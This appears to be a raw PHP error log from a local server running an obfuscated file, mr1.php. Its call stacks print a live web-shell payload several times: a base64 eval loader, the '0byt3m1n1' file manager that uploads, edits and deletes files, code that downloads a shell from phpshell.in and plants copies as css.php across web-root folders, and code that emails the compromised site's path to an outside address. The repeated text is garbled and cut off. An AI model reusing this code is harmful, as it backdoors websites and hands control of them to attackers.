';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2264540608fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:147 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/images/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 162
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2628541248fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:162
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 163
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2712541248fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:163
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 164
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2749541248fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:164
( ! ) Warning: fopen(C:/wamp64/www/wp-admin/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 168
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
